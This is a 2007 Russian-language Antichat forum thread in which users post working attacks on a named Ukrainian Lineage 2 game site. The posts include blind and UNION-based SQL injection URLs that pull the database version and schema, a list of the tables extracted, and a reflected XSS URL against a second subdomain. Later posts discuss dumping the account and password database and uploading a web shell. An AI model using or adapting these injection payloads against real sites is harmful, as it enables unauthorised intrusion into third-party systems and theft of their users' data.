ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Wnet
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Wnet
  #1  
Старый 04.07.2007, 13:45
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию Wnet
все таки одна скуля нашлась=)
Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),1,1)))=53/* 5
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),2,1)))=46/* .
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),3,1)))=49/* 1
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),4,1)))=46/* .
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),5,1)))=49/* 1
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),6,1)))=54/* 6
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+and(1=(select+1))/*
gratz constantine.
Последний раз редактировалось l1ght; 02.03.2009 в 12:53..
 
Ответить с цитированием

  #2  
Старый 04.07.2007, 16:57
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
А чего так криво)) связка операторов union+select вполне функционирует
Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/*
Какие то такие запросы будут получаться, инфу вывести не сложно
Код:
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x4e7063496e666f/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #3  
Старый 04.07.2007, 17:33
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Armor
ClassStats
Classes
DropLog
Drops
Dropsl2db
EtcItems
GainSkills
GainSkillsLog
IngredientLog
Ingredients
Ingredientsl2db
ItemNames
Items
Locations
Monsters
NpcInfo
NpcLog
NpcNames
QuestDetailLog
QuestDetails
QuestLog
QuestNames
Quests
RecipeLog
Recipes
Recipesl2db
SetItems
Sets
SkillNames
Skills
Stores
SysStrings
Teleports
Weapons
__________________
 
Ответить с цитированием

  #4  
Старый 05.07.2007, 13:37
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow
xss. ';/ фильтруются
Цитата:
http://l2w2new.wnet.ua/UserPanel/showchar.asp?action=search&name=%3CBODY%20onload=a lert(%22xss%22)%3E
 
Ответить с цитированием

  #5  
Старый 05.07.2007, 17:09
Аватар для helat
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162

Репутация: 156
По умолчанию
ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл
 
Ответить с цитированием

  #6  
Старый 05.07.2007, 18:53
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию
Цитата:
Сообщение от helat  
ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл
если реч идет о слити данных об акках которые стоят на етом сервере,то я незнаю как етот сервак но я много серваков ставил(у себя на компе)))и все они были на mysql
и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе...
Последний раз редактировалось Extremal; 05.07.2007 в 19:01..
 
Ответить с цитированием

  #7  
Старый 06.07.2007, 02:57
Аватар для M0rgan
M0rgan
Новичок
Регистрация: 04.07.2007
Сообщений: 26
Провел на форуме:
134504

Репутация: 7
По умолчанию
Офф на МайСкюл?
какие серваки ты ставил? может явы...
внет считается одним из топ УА сервов ла2...
то что там БД не Мумкул (от серва) гарантирую
+Гмы не настолько там тупы (с виду =))) )
было у мну дело тоже с оффом
вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло
с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось...
база с сервом стоят в офисе (хз что и как настроено)
теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь)
там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд)
ну а там думать )

строго не судите пост
02.00
 
Ответить с цитированием

  #8  
Старый 06.07.2007, 12:36
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию
да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету
Последний раз редактировалось Extremal; 06.07.2007 в 12:38..
 
Ответить с цитированием

  #9  
Старый 06.07.2007, 19:22
Аватар для M0rgan
M0rgan
Новичок
Регистрация: 04.07.2007
Сообщений: 26
Провел на форуме:
134504

Репутация: 7
По умолчанию
слуш почему ты так уверен что это ява то? )
вот сколько лет уже его почемуто оффом называют...
я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может...
и ставил его поверь мне не ребенок, серв профисиональный,
явы так обычно не работают много показателей...
хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом...

сомневаюсь очень крайне что он на мускуле...
ты хоть раз ставил офф?
еще раз вопрос - откуда такие сравнения?
---
 
Ответить с цитированием

  #10  
Старый 06.07.2007, 22:36
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию
Офф на каждом втором серваке сейчас стоит, слили все, кому не лень
По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ